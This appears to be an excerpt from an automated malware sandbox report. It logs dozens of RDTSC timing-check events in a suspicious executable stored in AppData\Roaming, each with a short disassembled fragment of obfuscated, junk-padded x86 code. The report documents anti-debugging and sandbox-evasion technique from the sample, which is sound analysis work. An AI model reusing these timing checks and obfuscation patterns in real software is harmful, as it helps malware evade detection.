Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: A54CDC second address: A54CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC314h 0x00000009 jc 00007F5828CEC306h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F30E64 second address: 4F30E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20DB8 second address: 4F20DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20DBC second address: 4F20DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20DC2 second address: 4F20DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F0013D second address: 4F00155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A74h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20AA7 second address: 4F20AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20AB7 second address: 4F20B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5828704A76h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F5828704A71h 0x00000018 jmp 00007F5828704A70h 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F5828704A77h 0x00000026 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F205DA second address: 4F205E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F205E0 second address: 4F2063B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007F5828704A74h 0x00000012 mov esi, 5EA6AF11h 0x00000017 pop ecx 0x00000018 push ebx 0x00000019 mov edi, esi 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F5828704A74h 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Dh 0x0000002c pushad 0x0000002d popad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F2063B second address: 4F20660 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, di 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20660 second address: 4F20665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20665 second address: 4F2066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F2066B second address: 4F2066F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F2066F second address: 4F20690 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20690 second address: 4F20696 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F3002A second address: 4F30076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5828CEC311h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F5828CEC313h 0x00000018 mov eax, 34A2D30Fh 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F30076 second address: 4F3007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F3007C second address: 4F300A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F300A1 second address: 4F300A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F300A5 second address: 4F300C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60E5F second address: 4F60E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A6Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F401CD second address: 4F40226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC310h 0x00000009 sub ecx, 7B117458h 0x0000000f jmp 00007F5828CEC30Bh 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F5828CEC318h 0x0000001b or ah, FFFFFFB8h 0x0000001e jmp 00007F5828CEC30Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 mov dword ptr [esp], ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40226 second address: 4F4022D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ch, bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4022D second address: 4F4026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC315h 0x00000009 jmp 00007F5828CEC30Bh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828CEC310h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4026B second address: 4F4027A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4027A second address: 4F4029B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push ecx 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+08h] 0x0000000e jmp 00007F5828CEC30Ah 0x00000013 and dword ptr [eax], 00000000h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4029B second address: 4F402A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F402A1 second address: 4F40304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828CEC312h 0x00000009 add ah, 00000068h 0x0000000c jmp 00007F5828CEC30Bh 0x00000011 popfd 0x00000012 jmp 00007F5828CEC318h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e pushad 0x0000001f mov si, 839Dh 0x00000023 mov dx, cx 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov di, A0A4h 0x0000002f jmp 00007F5828CEC30Dh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F2054F second address: 4F20553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20553 second address: 4F20559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F20559 second address: 4F2055F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F2055F second address: 4F20563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40016 second address: 4F4001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4001A second address: 4F40020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40020 second address: 4F40026 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40026 second address: 4F4002A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4002A second address: 4F40058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5828704A74h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5828704A6Eh 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40058 second address: 4F4005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F4005E second address: 4F40062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40062 second address: 4F40088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov ax, bx 0x00000013 popad 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5828CEC30Dh 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F40088 second address: 4F4009D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F6067F second address: 4F60685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60685 second address: 4F606BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F5828704A72h 0x00000008 pop esi 0x00000009 mov esi, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5828704A78h 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606BB second address: 4F606DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F5828CEC30Fh 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606DC second address: 4F606E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606E0 second address: 4F606E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606E4 second address: 4F606EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606EA second address: 4F606F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606F0 second address: 4F606F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606F4 second address: 4F606F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F606F8 second address: 4F60711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5828704A6Eh 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60711 second address: 4F60717 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60717 second address: 4F6071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F6071B second address: 4F6074A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F5828CEC319h 0x0000000e mov eax, dword ptr [76FA65FCh] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 mov ecx, 7D8FF139h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F6074A second address: 4F6078E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test eax, eax 0x0000000c jmp 00007F5828704A77h 0x00000011 je 00007F589A6C7C4Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx ebx, si 0x0000001d movzx eax, dx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F6078E second address: 4F60794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60794 second address: 4F60798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60798 second address: 4F607B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5828CEC313h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F607B7 second address: 4F607BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F607BD second address: 4F607C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F607C1 second address: 4F60838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f mov dl, 8Ah 0x00000011 call 00007F5828704A6Eh 0x00000016 pop esi 0x00000017 popad 0x00000018 and ecx, 1Fh 0x0000001b pushad 0x0000001c movsx ebx, cx 0x0000001f push ecx 0x00000020 jmp 00007F5828704A6Bh 0x00000025 pop ecx 0x00000026 popad 0x00000027 ror eax, cl 0x00000029 jmp 00007F5828704A6Fh 0x0000002e leave 0x0000002f jmp 00007F5828704A76h 0x00000034 retn 0004h 0x00000037 nop 0x00000038 mov esi, eax 0x0000003a lea eax, dword ptr [ebp-08h] 0x0000003d xor esi, dword ptr [007B2014h] 0x00000043 push eax 0x00000044 push eax 0x00000045 push eax 0x00000046 lea eax, dword ptr [ebp-10h] 0x00000049 push eax 0x0000004a call 00007F582CEF529Eh 0x0000004f push FFFFFFFEh 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F5828704A6Ah 0x0000005a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60838 second address: 4F6083C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F6083C second address: 4F60842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60842 second address: 4F60876 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 7B2FD2A3h 0x00000008 mov esi, 37E2F5FFh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 mov esi, 640AAA93h 0x00000019 popad 0x0000001a ret 0x0000001b nop 0x0000001c push eax 0x0000001d call 00007F582D4DCB6Ch 0x00000022 mov edi, edi 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F5828CEC315h 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F60876 second address: 4F608E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esp 0x0000000b jmp 00007F5828704A74h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F5828704A6Dh 0x0000001c sub ecx, 43CC7366h 0x00000022 jmp 00007F5828704A71h 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F5828704A70h 0x0000002e add ax, BB08h 0x00000033 jmp 00007F5828704A6Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F608E4 second address: 4F60912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828CEC30Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10147 second address: 4F10238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5828704A6Fh 0x00000009 sbb ax, 0DFEh 0x0000000e jmp 00007F5828704A79h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F5828704A77h 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F5828704A70h 0x00000027 or ax, 0F58h 0x0000002c jmp 00007F5828704A6Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov ebx, dword ptr [ebp+10h] 0x00000036 jmp 00007F5828704A76h 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F5828704A6Eh 0x00000043 or cl, FFFFFFE8h 0x00000046 jmp 00007F5828704A6Bh 0x0000004b popfd 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 push eax 0x00000051 jmp 00007F5828704A75h 0x00000056 xchg eax, esi 0x00000057 jmp 00007F5828704A6Eh 0x0000005c mov esi, dword ptr [ebp+08h] 0x0000005f jmp 00007F5828704A70h 0x00000064 xchg eax, edi 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 mov si, bx 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10238 second address: 4F1023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F1023E second address: 4F1024D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F1024D second address: 4F10251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10251 second address: 4F10260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10260 second address: 4F10278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC314h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F10278 second address: 4F102A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 pushad 0x0000000a mov dl, al 0x0000000c popad 0x0000000d test esi, esi 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 mov cx, 9629h 0x00000017 popad 0x00000018 je 00007F589A712DEBh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F5828704A6Bh 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F102A3 second address: 4F102E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov ah, AAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F5828CEC314h 0x0000001b add ecx, 6B0DA258h 0x00000021 jmp 00007F5828CEC30Bh 0x00000026 popfd 0x00000027 mov eax, 0A676B0Fh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F102E5 second address: 4F102F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A70h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 4F102F9 second address: 4F102FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
